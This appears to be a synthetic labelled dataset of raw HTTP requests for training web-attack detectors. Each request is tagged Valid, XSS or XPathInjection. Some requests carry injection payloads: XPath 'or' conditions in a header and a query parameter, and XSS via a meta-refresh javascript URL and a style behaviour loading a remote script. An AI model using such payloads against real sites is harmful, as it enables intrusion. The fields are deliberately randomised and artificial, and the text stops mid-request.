GET /nZPa/tetinEinuetht0/0ei8iemhlwq9lallR/el6jdobth4adsh6/ee3eddiomhT/GsamDLiframerJcatxrf.tiff?replaceclgzo9WOm=tB5g0oyzD0&SvreIWlettb=48&tb3hCbsv=%3Cu%3F7e&bkXw=0078&irspoh=ixml&qsteUgc=96963757&nEzliosnrt4oth5=lDE HTTP/1.0
Host: www.oolEsorsn.gov
Connection: close
Accept: video/*;q=0.5, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 25.155.215.195
Cookie: hwgetHfF=eLz
Cookie2: $Version="53"
Date: Mon, 16 Jan 06 14:52:18 UTC
ETag: W/"L-asoLJ_w3zcW2hC_PGB"
Expect: 100-continue
From: foniz@txtCtS.de
If-Modified-Since: Sat, 25 Sep 04 22:31:01 CET
If-Unmodified-Since: Sun, 23 Apr 06 02:01:30 GMT
If-Match: "vahSFrjSQ6F_5AQ_8"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic ZGE5ZTpwZXJRYXR1Yg==
Authorization: Digest nonce
Range: 029-
Referer: http://ncpe.it/Ech9/nDftc/auvknle/n9ecphR/0nigoeng.sh
TE: chunked;q=0.2,chunked
Trailer: Pragma
User-Agent: gIq4Dv8 http://www.huweo.org
UA-CPU: 68000
UA-Disp: 6878,6182,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: ooh/4.4 166.56.68.99, HTTP/5.6 www.eM1vdgr.gif
Transfer-Encoding: identity
Upgrade: tode/1.3
Warning: 789 148.216.97.93 "he2Hr6c" "Thu, 03 Aug 06 14:02:34 CET"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10353
Start - Id: 29714
class: Valid
GET /htpassf0bodyl49SNKfKth/cGuttn4zf6n9/zhJL1Axmc3Db/sILWAformSps7Jaccess_logA/eZtpx7V1vf/dRdp1RhXp.jpg?gmvYeA=aoSnpo&cspoaqnnslbo=33060495&1gog5jk=%7Ct&qUxbKl=hgo3cmdRd%7E-hISwto HTTP/1.1
Host: 28.232.102.80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-cn, windows-1252;q=0.2
Accept-Encoding: 
Accept-Language: iE3oyul-tshcmeg;q=0.3, a-ni1toouh;q=0.5, sy8aAin-cneu66;q=0.0, zqh8hy-Se3AiD;q=0.2, Saeirt-ot2ol
Cache-Control: 9heg=hhqtU
Client-ip: 193.153.56.245
Cookie: Tesen8eaS6e=855;M1=51353834;lkn9iuFo=970;hb8hHUpuhldo=51688;secaho9A=i;S%uJ4qUA=5395
Cookie2: $Version="8"
Date: Mon, 20 Oct 08 02:49:52 CET
ETag: "Tyk06NZnb.G40Hbqr6"
Expect: zojseoE=aet1tis;9eih
From: nonai@Twda.it
If-Modified-Since: Sat, 05 Dec 09 12:24:30 GMT
If-Unmodified-Since: Mon, 27 Feb 06 18:24:36 UTC
If-Match: "0JoNtD5u7kAOI7C"
If-None-Match: *
If-Range: Thu, 07 Aug 08 20:26:49 UTC
Max-Forwards: 004
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: Basic aXR0c3JDOkhrNmdl
Range: 3472-92,-3524
Referer: http://www.MEteTip.de/l2ypare/tgeRn/dsfEu/ctqhs/wrneuve.asmx
TE: trailers,trailers
Trailer: User-Agent
User-Agent: 0t2lr/3.9.7.8.5
UA-CPU: MIPS
UA-Disp: 0925,6962,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 502x1724
Via: HTTP/7.5 www.juoD.shtml, 1.2 www.r1rK8peg.gif, 8.4 www.n9s0.tiff
Transfer-Encoding: identity
Upgrade: mOze/0.8, daji/4.9, odn/5.9
Warning: 839 www.Adlc.css "l0hFhseecnn" 
X-Forwarded-For: 240.221.237.220
X-Serial-Number: 2911766071168
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29714
Start - Id: 48300
class: XPathInjection
GET /nn.Y/tPWwindow.openOr./afH4HerrDcTZy0o/i0JdwVbqzaY3Hd/oh/hr/5having/d7mhwtrmiaesyeti/zhnCba.dll?8Ecis2ltrbyrrna=eimo&-UTz-YOB4oLf=mosdblta6oomfe1nrr&X0tw6cmdHh@=e1WR2nr&7seaydapttnrti=aoeoTieq4eatn&BLnull@Pvz=iw2nmnenot&tw=6176734&nolmSee7dxye=27080685&lremRs=754921&9dreorh2lse=40&uiH5JEZweG=j6sefnc0rNaAoCtfo HTTP/1.0
Host: www.2ic7.biz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: rmhhAi'     or (i    <  count(obj/child::text())    and    j    <    count(cm/child::comment())     and  k     <     count(ac/child::*)    )   or    'oeg7nodu'='     haInLaOg' or
Accept-Language: uTctd-AxllxTo;q=0.9, n-Ii, xtser-oawei;q=0.3, 6Em9mlo-osilges7, tli-zcr3a;q=0.3
Cache-Control: no-transform
Client-ip: 117.94.16.119
Cookie: u8Ldfan=5ewiq;hEmsdtn6=eoMTT1;0twwsnduep=42690;r5oblheoasf=v7b
Cookie2: $Version="81"
Date: Wed, 21 Jul 04 11:46:59 CET
ETag: "eerlUYtS7n--gSm11ozn"
Expect: snoiTjo1=irrdax
From: mSrf3p@empeero.de
If-Modified-Since: Mon, 27 Nov 06 16:52:49 GMT
If-Unmodified-Since: Sun, 23 Mar 08 22:49:12 UTC
If-Match: "J5zMrAwRuDNVnqB35"
If-None-Match: *
If-Range: "W77b6dbr_3E2qGw8KDF"
Max-Forwards: 7716
MIME-Version: 6.0
Pragma: h3='cbisn7'
Proxy-Authorization: Digest nonce
Authorization: l3mee aaieteal=Eacttno
Referer: /zeeput/tHt8re/hrnar/ljhittto.jpeg
TE: deflate;q=0.1,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Hicasmutgh8oisLsszoo
UA-Disp: 161,1188,16
UA-Pixels: 7350x333
Via: 3.3 96.89.107.227
Transfer-Encoding: nisig
Upgrade: e0ePs/3.7, eids5/6.0, aacr/1.5, dsm/2.6, Stu/3.2
Warning: 917 209.120.191.237 "rpaWttoyTfGs" "Mon, 30 May 05 05:56:19 GMT"
X-Forwarded-For: 145.155.0.124
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48300
Start - Id: 25643
class: Valid
GET /dL0panYdxh5dodD-LGU@/TrmQAE.2HloguhAE.cfm?@9chH4reRhtpassor=aznEbt0cywz&wt4eIr=hkOH&nQco=uhitsL9htBu&4mtr=tp+tr5nnaop&xmeTatEowririe=3&oqsnpiGor=uandmihg&oe=0 HTTP/1.1
Host: www.ezCmtt.de:80
Connection: zhgtun
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: EsnE0-toao, tengaulx-ganoO;q=0.7, we8-3eUma;q=0.9, tuh-znuoheni;q=0.1
Cache-Control: max-stale=145
Client-ip: 94.156.110.119
Cookie: ottyect=739;eswEcsfai1=88904569;9ardon4cnzntalE=25316;dcog=rl-nn)p;rnarhubnlxov=fcIuettneohTrznrn
Cookie2: $Version="0"
Date: Thu, 02 Aug 07 06:06:04 UTC
ETag: "FnjGxMNMnh4M7n@"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sat, 26 Jun 04 02:18:39 CET
If-Unmodified-Since: Thu, 07 Aug 08 06:13:19 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 20 Feb 09 08:35:17 CET
Max-Forwards: 517
MIME-Version: 6.2
Pragma: eHda='ysSlsnnr'
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -8653,3111-
Referer: http://www.8usisdeo.biz/8toooc/tywee1.nsf
TE: deflate;q=0.6,trailers,gzip
Trailer: Pragma
User-Agent: aejLbVxK http://www.rseii.net
UA-CPU: 68000
UA-Disp: 841,3299,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: 3.4 www.nocrxe.png:53301
Transfer-Encoding: deflate
Upgrade: t4l/3.7, neThay/6.0, otri/7.6, oraT/8.6, imnM/8.2
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 25643
Start - Id: 2190
class: Valid
GET /1nh2ekAear7rnDto/saagn/itBopentEWoyUGo_7/lS943wD8NSEU8Zrl/vG/P2V23.jsp? HTTP/1.0
Host: 244.0.98.195
Connection: close
Accept: video/*;q=0.2, text/plain, audio/*;q=0.3
Accept-Charset: isiri-3342, x-mac-cyrillic, x-mac-greek, euc-jp, us-ascii
Accept-Encoding: 
Accept-Language: 3eui-ei4FhnP, w-Oew
Cache-Control: aiBlpos=mVy
Client-ip: 252.18.215.205
Cookie: mgts=604951;9eihspgfj=Ieokwmhel;Aixu0pt=p
Cookie2: $Version="9"
Date: Thu, 24 Jul 08 14:02:27 CET
ETag: "7dKcolqFrPttQt23Vf"
Expect: FRmA=r8veAs;k1pml=eatrrw
From: EAirsero@neoLi.gov
If-Modified-Since: Thu, 09 Feb 06 07:00:47 UTC
If-Unmodified-Since: Sat, 21 May 05 21:56:46 UTC
If-Match: "@rY@8m0-qYMKf2YW0vQ"
If-None-Match: *
If-Range: Tue, 09 Sep 08 22:57:16 GMT
Max-Forwards: 5
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM ZW9vem9xYXRseGtpUG5lZUVva0JsZXl5YnUxYXJvdHBobHZlZ29SSUE=
Authorization: Digest username="kdhf"
Range: 646-76073,721917-1
Referer: /s2nau08d/9hNfh0xU.png
TE: trailers
Trailer: Referer
User-Agent: ngwrrRef
UA-CPU: PowerPC
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 270x992
Via: Ssid/0.4 219.60.152.4
Transfer-Encoding: identity
Upgrade: ioc/1.6, eutE3/1.3, SawaL/3.8, ldot0/6.1, oha/5.5
Warning: 821 104.1.134.166 "maqrtuteli" "Fri, 07 Jan 05 07:27:00 CET"
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 26606464842114964
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2190
Start - Id: 17542
class: Valid
GET /mfDlpkI1UqnW0Vqhfb/ywecelo6ad6lmt/e5lWV/oR0@cHA/tCymw/tyPuG6b.asp?hhTn=03&saie=e0%3A&logf-F-=ofraepwgetstdinjus5Op&esss0mesaree=5537&Uiriey=aretheeecOdr&8Sjlsi=3rtmpcat&btNrfe=666&eaae6ng6eyf=igLjwuy5VYl&ye9n3tnhlehe=4668&kadai=lilolrbohco&gta5tgpE=Nssbo&taAmzktGTceh=862334&rldr=scriptktelnet1&e9j5ioy1eson=681&uHaeo=htpassOshutdownztY++wgetnrpnnmosek HTTP/1.0
Host: www.aVo4z.ch:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.3, compress, compress;q=0.6, identity, deflate;q=0.6
Accept-Language: lcM-ees, lhqYS-liedtH;q=0.7
Cache-Control: max-stale
Client-ip: 49.240.156.62
Cookie: otmNoareaah=12;bgAformK=6;F6ekihlrnjmaeoh=671346;iu1i=(;mcnhNnaaass8=292
Cookie2: $Version="2"
Date: Sun, 03 Sep 06 18:09:25 CET
ETag: "yVJB5ymB5@K_cDxHKK"
Expect: 100-continue
From: otDs@riqaOar1o.it
If-Modified-Since: Thu, 21 Dec 06 16:21:56 GMT
If-Unmodified-Since: Mon, 22 Dec 08 06:45:57 GMT
If-Match: "WY3AM0YnyIZ9rmf_A8"
If-None-Match: "XbqZcIdwh3iM@zZsq"
If-Range: Thu, 04 Sep 08 06:59:51 CET
Max-Forwards: 283
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: y31i oT4idrMo=estc2ua
Authorization: ljaa qgnt=toaai
Range: -848823,71971-191917
Referer: http://rh2jzW5d.uk/cSnr/ktqrhny.asmx
TE: trailers,gzip,deflate
Trailer: Authorization
User-Agent: Mozilla/7.3 (Windows; U; WinNT 6.3; fj-ng; rv:5.9.5) Gecko/98772363
UA-CPU: StrongARM
UA-Disp: 586,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 845x6872
Via: 8.7 96.217.99.2, Yahhi/2.9 78.89.63.150, ndeteE/3.5 17.157.28.89
Transfer-Encoding: identity
Upgrade: qnef/6.1, teHndi/9.7, n5GAtw/8.0, Epe/2.3
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 235.147.93.170
X-Serial-Number: 8998788877117234588
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17542
Start - Id: 24092
class: Valid
GET /QinEs5s2rQpJ@Sg/v@/rb_Sf4/xmlm/kSgS-yVJympDQQG4/aj99I1kHIDDbgiY/potu8m7.gif?eonakdsrerCbiee=6477&eszpe4R6Iot=0786537&form1BSLKlb.=ltrlM%404to&8adminizId2TQtn8=lsupdatez+g&qHWvk3uO=aErbs8aaht&mWba=cJFhgJy3w&hcr5=caetttnp2e7&hJV-vTbetween=kranhlTs&lwyrmmae=aeErF&nsezhhu8e62dno0=443972&wt=e&dwNoobtRn=metat&oe93njr=%7C%3Ce%2Flike HTTP/1.1
Host: www.AieN.st:789
Connection: keep-alive
Accept: image/jpeg;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 184.105.104.188
Cookie: Ruo=tveurrlCetl0tbd8;trimdr9jneeaens=wo7w4Mzp;RbkbLSw=eCLuqYKiOGk;atrator1g=tdCdHYsz;irusrsA=l3uA8qe0AyPups1m;onateeAacds=Wea
Cookie2: $Version="9"
Date: Thu, 22 Sep 05 22:21:33 GMT
ETag: "S44DbdJ0AYu-9WZWFH"
Expect: 100-continue
From: idehs@lb6ztam.biz
If-Modified-Since: Mon, 16 Oct 06 08:36:53 UTC
If-Unmodified-Since: Thu, 04 Jan 07 24:34:09 CET
If-Match: *
If-None-Match: "a_@OJqy9iuQ1gza0NTum"
If-Range: Mon, 20 Dec 04 14:47:34 CET
Max-Forwards: 917
MIME-Version: 3.7
Pragma: b='bo'
Proxy-Authorization: NTLM YWVnaXR1bmVodWFvZWFVTUVpbHJocmw4ZWNzbHMyZHRkbnNyZnhz
Authorization: Digest algorithm=MD5
Range: 8656-,477-859015,5910-
Referer: http://www.eatawdi.it/detSyt6/gvanlc/hseoanaw.css
TE: chunked;q=0.5,deflate,trailers
Trailer: Range
User-Agent: Mozilla/0.7 (X11; U; Unix 2.1; ts-so; rv:0.5.4) Gecko/41898378
UA-CPU: 68000
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 775x0014
Via: 2.4 120.132.88.85, 5.9 www.s1Oexnf.jpg
Transfer-Encoding: compress
Upgrade: orayl/3.8, rnnt/3.2, ise/8.1
Warning: 178 126.189.30.55 "LptaNsntoaeessie6" "Sun, 23 Jul 06 12:48:27 CET"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 740529934868246
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24092
Start - Id: 22739
class: Valid
GET /evO.5khZ_N/odoXZnCoptn/nmjbZuO9o3Pp90.tiff?tauloiwi=+opend&inrShRy9nxbui9=heigo3&nsfNdeGha=mxpc&oWtnnaz3vhotss2=id5RpA1man+a%3BreplaceemrE%40&qt=tcieeIC%3BdocumentAy&stta3tlu=ohabltoes%24%3C&x5sefhdme=790552886&LwUHxaYperl79K=tHXv&5sdloiaen=4622629 HTTP/1.0
Host: www.etna.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-korean;q=0.3, x-mac-greek;q=0.8, euc-cn;q=0.3, x-mac-arabic;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: fe-c;q=0.1
Cache-Control: min-fresh=72
Client-ip: 111.95.11.244
Cookie: MdeletenPV1IV=nslnQs;5gs3r=nGdlhdua0ima;K9Q1etc292AM=ynAJOWG9QOG;if2timeEapt=~nrwp-s
Cookie2: $Version="9"
Date: Tue, 21 Sep 04 21:43:56 CET
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: rMeOi=eDpqTt;a0a1
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Mon, 04 Jun 07 05:17:34 GMT
If-Unmodified-Since: Wed, 15 Aug 07 09:38:29 GMT
If-Match: *
If-None-Match: *
If-Range: "03S2rUwPeEl6d8JoC@v"
Max-Forwards: 63
MIME-Version: 9.4
Pragma: unt9stHe=oAetu
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: Digest uri=/hoiTptrr/lKaatsus/knaA.php4
Range: 32-,55-8,-1
Referer: http://www.clbn.biz/legos11t/ivngst/zsNos.asp
TE: trailers,trailers,chunked
Trailer: Referer
User-Agent: Mozilla/1.6 (X11; U; Unix 5.0; on-a0; rv:4.6.7) Gecko/90941191
UA-CPU: MIPS
UA-Disp: 482,155,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5645x571
Via: HTTP/0.8 www.s8me2psw.html:62555, FTP/1.0 www.eOmenis.jpeg:1219, HTTP/8.3 www.3itew.shtml
Transfer-Encoding: gzip
Upgrade: nt4mte/1.5, e7ttw/7.8, rqstaj/5.3, 2fytn/3.2, adu/2.2
Warning: 950 135.96.59.66 "get026dNoiraiwlk" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22739
Start - Id: 4328
class: Valid
POST /n4NlJDsvHKzx/s@U/2GWacJRtD8o@K2p5z/uWV/j.AF@1YerOXOyFpFvsJ/gL9.JeM8fwk/ginu/kSg4.pS_lyWq0a4.NjT/U@7bnFrhk/eoeytiNroeo01uadet/drk2cTCaeHias/d5vSn.php4? HTTP/1.0
Content-Length: 89
Content-Language: p
Content-Encoding: deflate
Content-Location: /sloepe/eerAT.ace
Content-MD5: YTlzNXh1MHQycXBpdHdpbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Apr 09 05:59:42 GMT
Last-Modified: Sat, 16 Oct 04 17:14:16 CET
Host: 133.3.172.247
Connection: close
Accept: application/*
Accept-Charset: euc-cn;q=0.7
Accept-Encoding: compress;q=0.3, compress
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 87.37.0.244
Cookie: iccnsbenuitcrl=) jdchtaccesoereH0a3twget;r9VMMA0d=n_ela;bEn35ssgF=728360;iRbllcg=lognetcatv
Cookie2: $Version="79"
Date: Tue, 16 Mar 04 06:44:22 UTC
ETag: W/"mZAukJyOO3GuhH1KuBe"
Expect: 100-continue
From: ULafe@0xcsih6.ch
If-Modified-Since: Tue, 13 Oct 09 18:50:24 CET
If-Unmodified-Since: Mon, 04 Jan 10 17:56:09 GMT
If-Match: *
If-None-Match: *
If-Range: "JS5yfkgwivBD_E_qH8Eu"
Max-Forwards: 8915
MIME-Version: 4.3
Pragma: eewgic='sn'
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -6985,-5545,-0
Referer: http://www.etaksria.cz/4nYl/nteennwn/imPwibwa/taef/tfna.txt
TE: trailers,deflate;q=0.1,deflate;q=0.8
Trailer: Trailer
User-Agent: eoldn (grJh7DkdR; bDBD46)
UA-CPU: Sparc
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8501x1867
Via: eoEn/9.2 64.40.238.136, 7.8 154.111.136.148
Transfer-Encoding: gzip
Upgrade: ecaed/7.5, nhrtah/6.4, getit/7.6, eo4it/0.0, orii3/9.3
Warning: 980 www.Rrmnetut.css:6 "sOlpsziur" "Wed, 25 Mar 09 01:43:09 GMT"
X-Forwarded-For: 184.207.120.162
X-Serial-Number: 936770860
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5PL5N-poptKl5=7&ulnaygavria= P&eh78shaaieTei=l&ecutsano=591047&ne3cymce=N5ozinEthfhttpstn

End - Id: 4328
Start - Id: 46896
class: XSS
POST /exzZ_awpQKz9.m-/esort2e/H4IbNmochaH6zWBchO-/utmsadNraJ/neseuafyn.png? HTTP/1.1
Content-Length: 393
Content-Language: 7
Content-Encoding: gzip
Content-Location: /euA7rvz.mdb
Content-MD5: dTJiaElqbnNubnFlYWl0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Sep 08 19:39:08 CET
Last-Modified: Sun, 21 Jun 09 17:23:52 GMT
Host: 3.223.52.18:6
Connection: close
Accept: audio/*, video/*, image/jpeg;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 165.85.124.10
Cookie: hE2a28asGatoa=bXSH;yshtesiatm0=aMRGm
Cookie2: $Version="07"
Date: Sun, 17 Oct 04 14:50:23 CET
ETag: "PfI32g8MOmatvmWLH"
Expect: nn9rnaex=r6EnRms;Reh7=hco2naP
From: nbfea3@yM2KA0.biz
If-Modified-Since: Mon, 21 Aug 06 24:06:10 CET
If-Unmodified-Since: Thu, 16 Jun 05 05:46:25 UTC
If-Match: "pnDiXMSWaz02KzTcSk-2"
If-None-Match: "EB1l2_cSfXqNpRA"
If-Range: *
Max-Forwards: 73
MIME-Version: 2.6
Pragma: tOr=enc
Proxy-Authorization: Digest nc=AcC43dEf
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /tdviiea.mpeg
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 5.0; du-tT; rv:0.8.8) Gecko/87527460
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8473x700
Via: 3.0 www.msRieUi.htm, FTP/8.5 www.emaoet9e.gif
Transfer-Encoding: tgnE; khhfc9=nsheti
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

sttiEzt=a os&nSwinntBvchildcopyCBtvF=090&iWAg6Zfromhtacceswindow.openQGE=848&s2eiBaa9xg=ett4ovbscripttselnjo&AStaeo8=26507953&tnO8d=xmlP0qgeh8processing-instruction:i tteotmaile&sef3noaotRejeo=t79Zbq&rbStoac6sesq=<meta     http-equiv=   "   refresh   " content    =   "  0;url=javascript:[alert    ('yioar');]  ">&egne=hoIi9lFRab&EhhCeneatffslop=htaccesht

End - Id: 46896
Start - Id: 18996
class: Valid
GET /sck18Qvd5UvtbpcycT/tfz5G5/OssIe/fpj/Lsf2eastestnsedoq/eyleguoott5/unta08shnecmewnSex9q/e9tttcusr1nlOphin/-gr6stylebY7.dll?ipmamnonevaskc=aotD9gp4Eu&ernsdsseo8lq=l2aeaxhrlsnsoett&aijsitel1ig0ioi=ru HTTP/1.1
Host: 11.94.162.158:80
Connection: close
Accept: video/*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: Oe-anbtokt;q=0.9
Cache-Control: Snet='e8ld'
Client-ip: 80.34.79.182
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="3"
Date: Sun, 01 Jan 06 07:32:44 CET
ETag: "v.fs8aP2gl-.Poow7ee2"
Expect: stppdeno
From: l14gyjst@isddra.be
If-Modified-Since: Tue, 21 Jul 09 15:51:35 CET
If-Unmodified-Since: Fri, 27 Aug 04 06:30:47 CET
If-Match: "Ld9u.KUisbrazHX5fF"
If-None-Match: *
If-Range: Sat, 21 Mar 09 10:16:49 UTC
Max-Forwards: 9
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest username="elrscge"
Authorization: NTLM bWN3b2VsZGl3aWV1bmVlY05uaXViRWZkZXNhc2hwYWEycHNkZUFMZXU=
Range: 2800-0168
Referer: http://igqEtSux.st/oaltoabe/gtnoe9.jsp
TE: trailers,deflate,gzip;q=0.2
Trailer: Connection
User-Agent: Mozilla/6.2 (Machintosh; U; PPC 9.4; l6-ua; rv:3.1.7) Gecko/17805733
UA-CPU: 68000
UA-Disp: 655,4589,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 249x219
Via: FTP/4.6 www.srmeere.shtml, HTTP/9.1 www.iEaEem.jpg, FTP/7.9 124.231.228.165
Transfer-Encoding: ulxe; ncrci2aa=bO5wd
Upgrade: mdo/3.9, 9exzxd/7.0, aITo/3.5, pxaam/9.7, o7a9aw/0.4
Warning: 169 www.heannrye.js "iiewmgoohytygohEPot0" "Tue, 01 Feb 05 02:54:07 CET"
X-Forwarded-For: 227.198.34.58
X-Serial-Number: 27260320301
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18996
Start - Id: 49721
class: XPathInjection
GET /i@FXh/beyswyubst.jsp?tunIiint=04&hlhncilpdoet=7tH6JT18OtKA&snoatoltc=7646&eicrokn6tina3l=q5otacusnc1&1fautals=89354+or+++++U%2F7s%2Ftt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D618%5D++++or++++50180%3D HTTP/1.0
Host: www.rceep9l6.it
Connection: trxnn3hs
Accept: video/*, video/quicktime;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 173.103.247.250
Cookie: gahEzdoooegq=s0dYvreorI;rUClsC=o0;2sluh3eeoEo=08822
Cookie2: $Version="6"
Date: Wed, 20 Dec 06 23:38:46 UTC
ETag: "iITkPXqitf-bCHofqIg"
Expect: aeda40o1=roasef;lhishow=zioCeH
From: u5ln@onsTkmM.ch
If-Modified-Since: Thu, 29 Jun 06 22:29:18 CET
If-Unmodified-Since: Sun, 20 Sep 09 06:20:50 UTC
If-Match: "NZ3kLJWnqif.xVD"
If-None-Match: *
If-Range: Sun, 14 May 06 10:21:04 GMT
Max-Forwards: 2678
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Digest uri=/hedrheik/adpmPk/e0tocuAk.gif
Range: -5,-8543,85-24971
Referer: http://www.rqmNDrhs.be/diz0i/foalya.asmx
TE: trailers
Trailer: Accept
User-Agent: Mozilla/6.5 (X11; U; Open BSD i586 6.3; 09-3s; rv:0.4.8) Gecko/07534319
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: HTTP/6.5 254.107.139.51, FTP/1.2 www.tnae.jpg:20
Transfer-Encoding: deflate
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49721
Start - Id: 47951
class: XSS
GET /sewTlMCOxf@lutsgcY_/raPeAd/ug-A9CWReakT7/n8pj2/61pJiH/oitthpg3sIenenen/e4h/.7MonTBXORFDAHG/reio/n4OGem.foIkDh3/co2GD.png?nech=%3Cdiv+++++style%3D+%22+behaviour%3A+++url%28%5Bhttp%3A%2F%2Fwww.retias.com%2Fscript%2FlhdayR.mdb%5D%29%3B+++++%22%3E&ndop=ecszz&vsNpsEso3stugR=rPbGeW&jttelwa9lbvqIrl=71&binW8Vm-aMlL=e%3A%3Cb3&tlEpotn=mhmimgrbtr&Ltecljioieneaw=objectiOlUsesroviis HTTP/1.0
Host: 134.63.77.158
Connection: keep-alive
Accept: audio/*;q=0.9, video/quicktime;q=0.6, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ihms-ien5teh, cnoerknd-moawj;q=0.8, way-fni;q=0.5
Cache-Control: no-transform
Client-ip: 73.242.58.95
Cookie: ln=ent;en=a dNaaihuybfD;1scriptQjC8eB=:b
Cookie2: $Version="771"
Date: Sat, 01 Nov 08 13:36:48 CET
ETag: "KcewOORnrl2FF.IfWMZO"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Fri, 13 Aug 04 17:24:36 CET
If-Unmodified-Since: Tue, 04 May 04 14:00:05 CET
If-Match: *
If-None-Match: "dLBB_VjqigBWfmbAnH"
If-Range: Sat, 24 Jan 04 15:20:52 UTC
Max-Forwards: 01
MIME-Version: 2.0
Pragma: hthe=r
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: Digest nc=D3344DE4
Range: -162,92-
Referer: /sprnr/nfegla.jpg
TE: deflate,trailers
Trailer: Date
User-Agent: Mozilla/1.3 (Windows; U; WinNT 6.1; au-Nr; rv:3.1.8) Gecko/17251533
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5386x6954
Via: 1.5 www.eoPe.jpg, 4.5 45.101.62.178, acE/7.3 www.utucNtd.jpg
